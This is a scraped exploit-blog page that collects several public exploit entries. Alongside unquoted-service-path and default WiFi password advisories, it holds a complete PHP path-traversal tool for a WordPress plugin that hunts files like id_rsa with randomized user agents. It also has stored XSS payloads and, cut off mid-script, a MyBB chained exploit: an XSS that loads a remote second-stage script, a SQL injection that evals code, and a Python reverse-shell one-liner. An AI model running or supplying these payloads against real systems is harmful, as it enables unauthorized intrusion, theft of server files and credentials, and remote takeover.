# Exploit Title: Equipment Inventory System 1.0 - 'multiple' Stored XSS
# Exploit Author: Jitendra Kumar Tripathi
# Vendor Homepage: https://www.sourcecodester.com/php/11327/equipment-inventory.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11327&title=Equipment+Inventory+System+using+PHP+with+Source+Code
# Version: 1
# Tested on Windows 10 + Xampp 8.0.3
Vulnerable Parameters: Item List , Employee Details , Position of Employee
*Steps to reproduce:*
1: Log in with a valid username and password.
2: Navigate to http://localhost/deped/admin/item.php
Add Item
Payload : <script>alert(1)</script>
Navigate to http://localhost/deped/admin/employee.php
Add Employee
Payload : <script>alert(2)</script>
Post Saved Sucessfully , reload your page or navigate to any page you will see these XSS triggered.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863147355
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Winpakpro 4.8 - 'GuardTourService' Unquoted Service Path
# Discovery by: Alan Mondragon
# Discovery Date: 2021-03-16
# Vendor Homepage: https://www.security.honeywell.com/product-repository/winpak
# Software Links : https://www.security.honeywell.com/product-repository/winpak
# WinPackPro
# Tested Version: 4.8
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro 64 bits
# Step to discover Unquoted Service Path:
C:\WINDOWS\system32>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
WIN-PAK Guard Tour Server GuardTourService C:\Program Files <x86>\WINPAKPRO\WP GuardTour Service.exe Auto
C:\Users\jorge.irigoyen>sc qc "GuardTourService"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: CtesDurSvc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START <DELAYED>
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files <x86>\WINPAKPRO\WP GuardTour Service.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : WIN-PAK Guard Tour Server
DEPENDENCIAS : WPDatabaseService
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
# Exploit Title: WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal
# Date: 19/03/2021
# Exploit Author: Nicholas Ferreira
# Vendor Homepage: https://github.com/A5hleyRich/delightful-downloads
# Version: <=1.6.6
# Tested on: Debian 11
# CVE : CVE-2017-1000170
# PHP version (exploit): 7.3.27
# POC: curl --data "dir=/etc/" http://example.com/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
<?php
$vuln_file = "/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"; // do not change
$agents = ["Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.0; Trident/3.0)",
"Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X; sl-SI) AppleWebKit/531.37.3 (KHTML, like Gecko) Version/4.0.5 Mobile/8B119 Safari/6531.37.3",
"Mozilla/5.0 (Macintosh; PPC Mac OS X 10_6_6 rv:6.0) Gecko/20120629 Firefox/35.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.1)",
"Mozilla/5.0 (iPad; CPU OS 7_2_2 like Mac OS X; sl-SI) AppleWebKit/531.5.4 (KHTML, like Gecko) Version/3.0.5 Mobile/8B113 Safari/6531.5.4",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0) AppleWebKit/5321 (KHTML, like Gecko) Chrome/37.0.837.0 Mobile Safari/5321",
"Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/535.12.4 (KHTML, like Gecko) Version/5.1 Safari/535.12.4",
"Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X; en-US) AppleWebKit/531.18.4 (KHTML, like Gecko) Version/4.0.5 Mobile/8B118 Safari/6531.18.4",
"Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/531.12.4 (KHTML, like Gecko) Version/4.0.3 Safari/531.12.4",
"Mozilla/5.0 (compatible; MSIE 5.0; Windows 98; Win 9x 4.90; Trident/5.0)",
"Opera/8.98 (Windows NT 5.0; en-US) Presto/2.11.268 Version/10.00",
"Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X; sl-SI) AppleWebKit/534.16.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B111 Safari/6534.16.2",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100107 Firefox/36.0",
"Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/535.23.6 (KHTML, like Gecko) Version/4.0.2 Safari/535.23.6",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20120805 Firefox/36.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0) Gecko/20130123 Firefox/37.0",
"Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 6.0; Trident/4.1)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_9 rv:6.0) Gecko/20190226 Firefox/36.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/533.39.1 (KHTML, like Gecko) Version/4.0.3 Safari/533.39.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1 rv:4.0) Gecko/20160603 Firefox/37.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/5341 (KHTML, like Gecko) Chrome/37.0.831.0 Mobile Safari/5341",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_9 rv:5.0; en-US) AppleWebKit/532.20.3 (KHTML, like Gecko) Version/4.0 Safari/532.20.3",
"Opera/9.74 (X11; Linux x86_64; sl-SI) Presto/2.10.265 Version/12.00",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/5340 (KHTML, like Gecko) Chrome/37.0.813.0 Mobile Safari/5340",
"Opera/9.60 (Windows NT 6.2; en-US) Presto/2.9.333 Version/11.00",
"Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_2) AppleWebKit/5362 (KHTML, like Gecko) Chrome/40.0.862.0 Mobile Safari/5362",
"Opera/9.74 (Windows NT 5.0; en-US) Presto/2.8.188 Version/10.00",
"Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/531.17.1 (KHTML, like Gecko) Version/5.1 Safari/531.17.1",
"Opera/9.93 (Windows CE; sl-SI) Presto/2.12.174 Version/12.00",
"Opera/8.19 (X11; Linux i686; en-US) Presto/2.12.301 Version/10.00",
"Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/532.7.2 (KHTML, like Gecko) Version/4.0.4 Safari/532.7.2",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 4.0; Trident/3.0)",
"Opera/9.71 (X11; Linux x86_64; en-US) Presto/2.12.270 Version/12.00",
"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/4.1)",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2 rv:4.0) Gecko/20130506 Firefox/37.0",
"Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/531.44.7 (KHTML, like Gecko) Version/4.0.4 Safari/531.44.7",
"Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.1.20) Gecko/20110731 Firefox/35.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/5341 (KHTML, like Gecko) Chrome/37.0.831.0 Mobile Safari/5341",
"Opera/9.74 (X11; Linux x86_64; sl-SI) Presto/2.10.265 Version/12.00",
"Opera/9.60 (Windows NT 6.2; en-US) Presto/2.9.333 Version/11.00",
"Mozilla/5.0 (iPad; CPU OS 7_0_2 like Mac OS X; en-US) AppleWebKit/535.7.5 (KHTML, like Gecko) Version/4.0.5 Mobile/8B115 Safari/6535.7.5",
"Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_2) AppleWebKit/5362 (KHTML, like Gecko) Chrome/40.0.862.0 Mobile Safari/5362",
"Opera/9.74 (Windows NT 5.0; en-US) Presto/2.8.188 Version/10.00",
"Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/531.17.1 (KHTML, like Gecko) Version/5.1 Safari/531.17.1",
"Opera/9.93 (Windows CE; sl-SI) Presto/2.12.174 Version/12.00",
"Mozilla/5.0 (Windows; U; Windows 98; Win 9x 4.90) AppleWebKit/535.13.4 (KHTML, like Gecko) Version/4.0.4 Safari/535.13.4",
"Opera/8.19 (X11; Linux i686; en-US) Presto/2.12.301 Version/10.00",
"Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/532.7.2 (KHTML, like Gecko) Version/4.0.4 Safari/532.7.2",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 4.0; Trident/3.0)",
"Opera/9.71 (X11; Linux x86_64; en-US) Presto/2.12.270 Version/12.00",
"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/4.1)",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2 rv:4.0) Gecko/20130506 Firefox/37.0",
"Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/531.44.7 (KHTML, like Gecko) Version/4.0.4 Safari/531.44.7",
"Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.1.20) Gecko/20110731 Firefox/35.0",
"Opera/8.11 (X11; Linux x86_64; en-US) Presto/2.11.165 Version/11.00",
"Mozilla/5.0 (iPad; CPU OS 7_2_1 like Mac OS X; en-US) AppleWebKit/532.33.6 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6532.33.6",
"Opera/9.71 (X11; Linux x86_64; sl-SI) Presto/2.10.180 Version/11.00",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1 rv:5.0) Gecko/20130122 Firefox/36.0",
"Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Trident/3.0)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows 95; Trident/4.1)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.1)",
"Opera/8.33 (X11; Linux x86_64; en-US) Presto/2.8.320 Version/12.00",
"Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20121221 Firefox/36.0",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_9 rv:4.0) Gecko/20200625 Firefox/35.0",
"Mozilla/5.0 (Windows NT 6.0; sl-SI; rv:1.9.0.20) Gecko/20200505 Firefox/37.0",
"Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/532.44.4 (KHTML, like Gecko) Version/5.0 Safari/532.44.4",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_9 rv:3.0) Gecko/20201229 Firefox/37.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/531.17.6 (KHTML, like Gecko) Version/4.1 Safari/531.17.6",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/5311 (KHTML, like Gecko) Chrome/38.0.877.0 Mobile Safari/5311",
"Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/531.4.3 (KHTML, like Gecko) Version/5.1 Safari/531.4.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_0 rv:4.0) Gecko/20140118 Firefox/35.0",
"Mozilla/5.0 (Windows 95) AppleWebKit/5330 (KHTML, like Gecko) Chrome/36.0.847.0 Mobile Safari/5330",
"Opera/8.39 (Windows 98; sl-SI) Presto/2.9.202 Version/11.00",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5 rv:3.0; en-US) AppleWebKit/534.11.4 (KHTML, like Gecko) Version/5.0 Safari/534.11.4"];
function post_request($url, $data, $random_agent = 0){
global $agents;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array("dir" => $data));
#curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080"); //debug w/ burp
if($random_agent){
curl_setopt($ch, CURLOPT_USERAGENT, $agents[rand(0,count($agents)-1)]);
}
$output = curl_exec($ch);
curl_close($ch);
return $output;
}
function parse_dir($str){ // by raina77ow =)
$contents = array();
$startFrom = $contentStart = $contentEnd = 0;
while (false !== ($contentStart = strpos($str, 'rel="', $startFrom))){
$contentStart += 5;
$contentEnd = strpos($str, '">', $contentStart);
if (false === $contentEnd){
break;
}
$contents[] = substr($str, $contentStart, $contentEnd - $contentStart);
$startFrom = $contentEnd + 2;
}
return $contents;
}
function list_files($url,$path, $recursive=0,$filter){
global $vuln_file;
global $recursive;
global $random_agent;
$exts = "";
$extensions = "";
$files = "";
(count($filter) > 0) ? $has_filter = 1 : $has_filter = 0;
$parsed = parse_dir(post_request($url.$vuln_file, $path, $random_agent)); // array tree
foreach($parsed as $file_or_folder){
if($has_filter){
foreach($filter as $filtered){
if(strpos($file_or_folder, $filtered) !== false){ //if the current file contains any of the filter
echo " ".$file_or_folder."\n";
continue;
}
if(preg_match_all("#^\/.*\/$#", $file_or_folder)){ // is a folder
if($recursive){ //if recursive flag is set, enter on each folder and do it
list_files($url, $file_or_folder, $recursive, $filter);
}
continue 2; // continue the outermost foreach
}
}
continue; // if has filter, always restart the loop here
}
if(preg_match_all("#^\/.*\/$#", $file_or_folder)){ // is a folder
if($recursive){ //if recursive flag is set, enter on each folder and do it
list_files($url, $file_or_folder, $recursive, $filter);
}else{
echo " ".$file_or_folder."\n"; //if it's not to be recursive, just print the folder name
}
}else{ //is a file
echo " ".$file_or_folder."\n";
}
continue;
}
}
function alert_user($target,$path, $recursive, $filter){ //scan the root of the server recursivelly can really be a pain
if($path == "/" && $recursive == 1){
echo red(" [i] WARNING: Scanning the root of the webserver recursivelly can
exceed the timeout limit, block your IP or even take down the server.
Are you sure you want to continue? [y/N] ");
$handle = fopen ("php://stdin","r");
$line = fgets($handle);
if(trim(strtoupper($line)) != 'Y'){
echo "\n Aborted. Try running me without the recursion flag\n\n";
exit;
}
fclose($handle);
echo cyan("\n\n Ok, don't say I didn't warn you...\n");
}
list_files($target,$path, $recursive, $filter);
}
############################################################
function green($str){
return "\e[92m".$str."\e[0m";
}
function red($str){
return "\e[91m".$str."\e[0m";
}
function yellow($str){
return "\e[93m".$str."\e[0m";
}
function cyan($str){
return "\e[96m".$str."\e[0m";
}
function banner(){
echo "
_____ _ _ _ _ __ _ _______
| __ \ | (_) | | | | / _| | |__ __|
| | | | ___| |_ __ _| |__ | |_| |_ _ _| | | |_ __ ___ ___
| | | |/ _ \ | |/ _` | _ \| __| _| | | | | | | ´__/ _ \/ _ \
| |__| | __/ | | (_| | | | | |_| | | |_| | | | | | | __/ __/
|_____/ \___|_|_|\__, |_| |_|\__|_| \__,_|_| |_|_| \___|\___|
__/ | ".green("Coder: ").yellow("Nicholas Ferreira")."
|___/ 0x7359
".cyan("Delightful Downloads - Jquery File Tree")."
Unauthenticated Path Traversal exploit ".
red("\n (CVE-2017-1000170)")."
";
}
// ======================= CHECKING =======================
$short_args = "u:h::p:r::f:a::";
$long_args = array("url:","help::","path:","recursive::","filter:","random-agent::");
$options = getopt($short_args, $long_args);
if($argc == 1){
die(banner()." Usage: php xpl_jqueryFileTree.php -u url [-x extensions] [-p path] [-r] [-h] [-a]\n\n Help: -h or --help\n\n");
}
if(isset($options['h']) || isset($options['help'])){
banner();
die( " Usage: php ".$argv[0]." -u url [-f extensions/filenames] [-p path] [-r] [-h] [-a]
-h, --help: Show this message
-u, --url: URL of target
-a, --random-agent: Use random user agents
-f, --filter: Name of files or extensions to search for (separated by comma)
-p, --path: The full path from which the filenames will be read (default: /)
-r, --recursive: Generates the tree recursivelly (be careful)
e.g.: ".cyan($argv[0]." -u victim.com -f .zip,.sql -p /var/www/html/backup/admin/ -r")."
|
\-> This will search for all .zip and .sql files inside victim.com/backup/admin and its subpaths
(You must provide the dot to indicate it's an extension)
".cyan($argv[0]." -u victim.com -f .log,id_rsa -a -r")."
|
\-> This will search for all files named \"id_rsa\" or having the extension
\".log\" within all folders of the server, with random user-agents
".yellow("Tip: use \"php ..... | tee output\" to save the result to an output file")."
");
}
$random_agent = 0;
if(isset($options['a'])){
$random_agent = 1;
}elseif(isset($options['random-agent'])){
$random_agent = 1;
}
$target = "";
if(isset($options['u'])){
$target = $options['u'];
}elseif(isset($options['url'])){
$target = $options['url'];
}
$recursive = 0;
if(isset($options['r'])){
$recursive = 1;
}elseif(isset($options['recursive'])){
$recursive = 1;
}
$path = "/";
if(isset($options['p'])){
$path = $options['p'];
}elseif(isset($options['path'])){
$path = $options['p'];
}
if($path !== "/"){
if(!preg_match("#^\/.*\/$#", $path)){
$path = str_replace("//", "/", "/".$path."/"); // $path must be of the form /<path>/ for this to work, so lets force it
}
}
$extensions = "";
if(isset($options['f'])){
$extensions = $options['f']; //strings
}elseif(isset($options['filter'])){
$extensions = $options['filter']; //string
}
$filter = array();
if($extensions !== ""){
$filter = explode(",", $extensions);
}
// ========================= END CHECKING ==========================
function is_vulnerable($url){
global $vuln_file;
global $random_agent;
global $filter;
echo " [*] Target: ".$url."\n";
if(count($filter) > 0){
echo " [*] Filter: ".implode(", ", $filter)."\n\n";
}
echo cyan(" [i] Checking if the target is vulnerable...\n");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url.$vuln_file);
curl_setopt($ch, CURLOPT_NOBODY, true); // HEAD request to vulnerable file
curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if(substr($code,0,1) == 2){ // 2xx
echo yellow(" [i] HTTP response of vulnerable file is 2xx. May be vulnerable!\n");
$post = post_request($url.$vuln_file, "/", $random_agent);
if(preg_match_all("/jqueryfiletree.*(bin|boot|dev|etc|var|usr|windows|users|temp)/", strtolower($post))){
echo green(" [+] Target is vulnerable! Getting file list...\n\n");
return true;
}
echo red(" [-] Target is not vulnerable... =(\n\n");
}else{
echo red(" [-] Could not find a valid vulnerable file. Maybe it doesn't exist,
you don't have permission to read it or it is in another directory.\n");
}
return false;
}
banner();
if(is_vulnerable($target)){
global $filter;
alert_user($target,$path, $recursive, $filter);
echo green("\n [+] Done!\n\n");
}
?>
# Exploit Title: Winpakpro 4.8 - 'WPCommandFileService' Unquoted Service Path
# Discovery by: Alan Mondragon
# Discovery Date: 2021-03-16
# Vendor Homepage: https://www.security.honeywell.com/product-repository/winpak
# Software Links : https://www.security.honeywell.com/product-repository/winpak
# WinPackPro
# Tested Version: 4.8
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro 64 bits
# Step to discover Unquoted Service Path:
C:\WINDOWS\system32>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
WIN-PAK WPCommandFileService WPCommandFileService C:\Program Files <x86>\WINPAKPRO\WPCommandFileService Service.exe Auto
C:\Users\jorge.irigoyen>sc qc "WPCommandFileService"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: CtesDurSvc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START <DELAYED>
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files <x86>\WINPAKPRO\WPCommandFileService Service.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : WIN-PAK Command File Service
DEPENDENCIAS : WPDatabaseService
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
# Exploit Title: Winpakpro 4.8 - 'ScheduleService' Unquoted Service Path
# Discovery by: Alan Mondragon
# Discovery Date: 2021-03-16
# Vendor Homepage: https://www.security.honeywell.com/product-repository/winpak
# Software Links : https://www.security.honeywell.com/product-repository/winpak
# WinPackPro
# Tested Version: 4.8
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro 64 bits
# Step to discover Unquoted Service Path:
C:\WINDOWS\system32>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
WIN-PAK ScheduleService ScheduleService C:\Program Files <x86>\WINPAKPRO\ScheduleService Service.exe Auto
C:\Users\jorge.irigoyen>sc qc "ScheduleService"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: CtesDurSvc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START <DELAYED>
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files <x86>\WINPAKPRO\ScheduleService Service.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : WIN-PAK Schedule Service
DEPENDENCIAS : WPDatabaseService
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
# Exploit Title: MacPaw Encrypto 1.0.1 - 'Encrypto Service' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 03-19-2020
# Vendor Homepage: https://macpaw.com/encrypto
# Software Links : https://dl.devmate.com/com.macpaw.win.Encrypto/EncryptoforWin.exe?cid=78456412.1616181092
# Tested Version: 1.0.1
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
Encrypto Service Encrypto.Service C:\Program Files\Encrypto\Encrypto.Service.exe Auto
C:\>sc qc "Encrypto.Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: Encrypto.Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START (DELAYED)
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Encrypto\Encrypto.Service.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Encrypto Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The device generates its SSID and password based on the
WAN MAC address.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5638
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5638.php
03.02.2021
--
Example defaults:
# ifconfig |grep HWaddr
br0 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
br0:9 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
eth2 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
eth2.1 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
eth2.100 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
eth2.1000 Link encap:Ethernet HWaddr 6C:AD:EF:16:7C:5D
eth2.2 Link encap:Ethernet HWaddr 6C:AD:EF:FF:00:01
ra0 Link encap:Ethernet HWaddr 6C:AD:EF:5D:7C:5C
rai0 Link encap:Ethernet HWaddr 6C:AD:EF:5E:7C:5C
SSID1=MyWiFi-167C5D
SSID1=MyWiFi-5G-167C5D
WiFi password = EF167C5D
# Exploit Title: OSAS Traverse Extension 11 - 'travextensionhostsvc' Unquoted Service Path
# Exploit Auth: Tech Johnny
# Vendor Homepage: https://www.osas.com
# Version: 11 x86
# Tested on: Windows 2012R2
Details:
C:\Windows\system32>wmic service get name, pathname, displayname,
startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr
/i /v """
TRAVERSE Automation Service TravExtensionHostSvc C:\Program Files\Open
Systems, Inc\TRAVERSE\TRAVERSE.Host.CustomExtensions.exe Auto
C:\Windows\system32>sc.exe qc travextensionhostsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: travextensionhostsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Open Systems,Inc\TRAVERSE\TRAVERSE.Host.CustomExtensions.exe
LOAD_ORDER_GROUP : TAG : 0
DISPLAY_NAME : TRAVERSE Automation Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: MyBB 1.8.25 - Chained Remote Command Execution
# Exploit Author: SivertPL (kroppoloe@protonmail.ch)
# Date: 19.03.2021
# Description: Nested autourl Stored XSS -> templateset second order SQL Injection leading to RCE through improper string interpolation in eval().
# Software Link: https://resources.mybb.com/downloads/mybb_1825.zip
# CVE: CVE-2021-27889, CVE-2021-27890
# Reference: https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums
# The exploit requires the target administrator to have a valid ACP session.
# Proof of Concept Video: https://www.youtube.com/watch?v=xU1Y9_bgoFQ
# Guide:
1) In order to escape various checks, the XSS has to download this .js file from an external server, and then execute it.
Please replace the source of the following script node with an URL pointing to the second stage .js file (this file) to be downloaded by the target.
document.write('<script src=http://localhost:8000/second_stage.js></script>');
2) Please encode the aforementioned JS payload with String.fromCharCode, to achieve constraint-less JavaScript execution environment.
You can use this website: https://eve.gd/2007/05/23/string-fromcharcode-encoder/
3) Put the resulting encoded payload in the nested autourl vulnerability vector:
[img]http://xyzsomething.com/image?)http://x.com/onerror=<FCC ENCODED PAYLOAD>;//[/img]
4) The final payload should look like this:
[img]http://xyzsomething.com/image?)http://x.com/onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,58,56,48,48,48,47,119,111,114,109,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59));//[/img]
5) Send the full vector to the target, either by private message, a post, or any other place where MyCode (BBCode) is supported.
Once the target's browser renders the page, the XSS vulnerability will fire and download & execute the second stage payload from the website specified above, using document.write() to 'bypass' SOP.
After the execution of the payload, you should receive a reverse shell, provided the admin has a valid ACP session.
6) Enjoy your RCE! For educational purposes only.
const REVERSE_SHELL_IP = "localhost";
const REVERSE_SHELL_PORT = 5554;
const PAYLOAD_XML_NAME = "payload";
const PAYLOAD_XML_VERSION = "1821";
const XML_PROLOG = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>";
const SHELL_PAYLOAD = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + REVERSE_SHELL_IP + "\"," + REVERSE_SHELL_PORT + "));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
const SQL_PAYLOAD = "') AND 1=0 UNION SELECT title, '${passthru(base64_decode(\\'" + btoa(SHELL_PAYLOAD) + "\\'))}' from mybb_templates -- ";
// Trigger the actual vulnerability, force cache reload.
// Stage: Final
function trigger() {
var request = new XMLHttpRequest();
request.open('GET', '/index.php');
request.send();
}
// Poison the cache.
// Stage: 6
